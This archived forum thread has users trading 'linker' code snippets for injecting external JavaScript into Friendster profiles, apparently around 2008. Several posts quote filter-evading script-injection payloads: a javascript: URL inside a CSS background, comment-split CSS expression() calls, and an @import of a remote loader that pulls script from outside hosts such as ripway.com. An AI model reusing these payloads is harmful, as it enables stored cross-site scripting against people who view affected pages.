• ARCHIVES 
  • » new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

lloyd
» FTalker
FTalk Level: zero
1969-12-31

Re: new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

hmmm!! new linker again whahaha!!! tnx for this !!weeeeee!! [b]@ nehemiah[/b] why dont you post the site properly so that all ftalker will know!! hmmm!! just a sugestion!!! again tnx for the site!!weeeeeeee
CoWoCuPu
» FTalkElite
1969-12-31

Re: new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

its not working,, is there somethin' wrong with ma linker,, or wut?! the codes?? :smoke:
ameng
» n00b
1969-12-31

Finally the linker works on my profile..i mean the lastest 1 by the cradle~ for those who is still searching for the new linker..try the link from [b]nehemiah[/b] :thumbsup:

Last edited by ameng (2008-05-02 10:06:56)

adepat
» FTalker
1969-12-31

[quote=switpotato]juz dont logout urself first... wakoko my other sample is still working coz i never did login again... but with my new one.. i logout and login... tadan!! my sample is gone... nyahahahaha anywayz.. this codes still working but only for IE user by archer &#60div id=a style="background:url(javascript:function b(){c=document.createElement('script');c.src=a.innerHTML;a.appendChild(c);}onload=b);margin-top:-10000">URL HERE</div>[/quote] sis it's not working in my profile.
switpotato
» FTalkGeek
1969-12-31

adepat dont try it.. i got new one... ill test it more before i share
tacki
» n00b
1969-12-31

it still works on my profile.... but the js/txt url shows in the mediaBox..,
portuniecho
» FTalkWhiz
1969-12-31

da one dat ate nix/swit posted is for IE6 below,, if u are IE7 it will not work on u,, instead,, generate ur js file here =) http://the-cradle.users-board.com/JS-Linker-h63.htm
adepat
» FTalker
1969-12-31

=)[quote=switpotato]adepat dont try it.. i got new one... ill test it more before i share[/quote] sis I got the new one already from angell. thank you and tnx to angell :wow:
portuniecho
» FTalkWhiz
1969-12-31

best tip..hahaha ,, easy editing,, <style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:[b]expres/**/sion[/b](function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:[b]expres/**/sion[/b](cradle.style.obj='0');visibility:hidden">JS here</a> just change the bolded part into this one [b]expression[/b]

Last edited by portuniecho (2008-05-02 13:21:54)

Angeli_7
» FTalkGeek
1969-12-31

Is the css linker filtered too? =|
kesotinapay
» n00b
1969-12-31

my code still not working..thats why i only use css linker.. need some help here.. tnx <">

Last edited by kesotinapay (2008-05-02 15:21:41)

Jblack
» n00b
1969-12-31

[quote=kesotinapay]my code still not working..thats why i only use css linker.. need some help here.. tnx Code: <style type='text/css'>@import url(http://h1.ripway.com/thecradle/loader.swf);</style><a id='cradle' style="obj:expression(function b(){c=document.createElement('script');c.src=cradle.innerHTML;navBg.appendChild(c)}b());text:expression(cradle.style.obj='0');visibility:hidden">http://h1.ripway.com/edryll/wvm2/tracker.js</a>[/quote] change your file extension with [b]*.txt[/b] or [b]*.swf[/b]

Last edited by Jblack (2008-05-02 15:43:54)

kesotinapay
» n00b
1969-12-31

still the same..:(
ree54
» n00b
1969-12-31

yeah, try the linker's of nehemian if u want the text of js link not shown again! :rose::rose:
bobcbar
» FTalkElite
1969-12-31

I am using archangels linker and the url of my file is not showing :o
geoffellen
» n00b
1969-12-31

@Nehemiah :D its workin thnx to cradle =)

Last edited by geoffellen (2008-05-02 19:03:14)

Cryogenix
» FTalkAddict
1969-12-31

Here's a SPOONFEED for those of you who still can't get your linkers working: <">The code above is from http://the-cradle.users-board.com/JS-Linker-h63.htm I am using it and is currently working for both FF and IE. And for those who wish to hide their media box, you can add this on your external js: <">
jhoncy201
» n00b
1969-12-31

[quote=bobcbar]I am using archangels linker and the url of my file is not showing :o[/quote] [b]try bob to add some items on ur media box and then it will show :o thats what happened to me :retard:[/b]

Last edited by jhoncy201 (2008-05-02 20:33:41)

lloyd
» FTalker
1969-12-31

[b]@ jhoncy201[/b] may i ask what happen or what u mean!! that if bobcbar add some item in his media box!??? btw what happen to your media box!!??

Last edited by lloyd (2008-05-02 20:49:10)

bobcbar
» FTalkElite
1969-12-31

[quote=jhoncy201]bobcbar wrote: I am using archangels linker and the url of my file is not showing try bob to add some items on ur media box and then it will show thats what happened to me Last edited by jhoncy201 (Today 19:33:41)[/quote] If you look at my other profile you will see my media box has stuff in it..not hidden like the profile I display for ftalk...[url]www.friendster.com/bobcbar[/url]
  • ARCHIVES 
  • » new linker has bean post right know.. tested its working on my profile here is the new linker of Angel De Ville Guys, please, once you have inserted the linker in your profiles, try not to touch th

Board footer

© 2024 F Talk

Current time is 17:45

[ 9 queries - 0.057 second ]
Privacy Policy